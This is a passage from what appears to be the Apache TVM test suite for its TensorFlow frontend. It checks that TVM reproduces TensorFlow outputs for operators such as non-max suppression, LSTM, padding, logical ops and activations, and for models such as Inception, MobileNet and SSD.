in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
"""NonMaxSuppressionV3,5"""
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
def get_random_scores(size, dtype):
size1d = np.prod(size)
scores = np.linspace(0, 1, num=size1d)
np.random.shuffle(scores)
return scores.reshape(size).astype(dtype)
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = get_random_scores(score_shape, dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
)
def test_forward_combined_nms():
"""CombinedNonMaxSuppression"""
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 32, 1, 4), (1, 32, 1), 0.7, 0.5, 10, 64)
_test_forward_combined_nms((1, 32, 1, 4), (1, 32, 2), 0.7, 0.5, 32, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
# This workload seems flaky on CI.
# See https://github.com/apache/tvm/issues/8140
# _test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 10), 0.4, 0.2, 150, 1000)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
"""One iteration of a LSTM cell"""
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
"""One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
"""Pad"""
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
"""Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10275")
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
@pytest.mark.skip(
reason="Use of threading module here hides errors, see https://github.com/apache/tvm/pull/10231"
)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
# Cell inputs 'c and 'h' consist of all layers values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).numpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).numpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
# Create 10 predicted statments of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
"""testing local response normalization"""
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
"""testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
_test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
_test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax"""
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
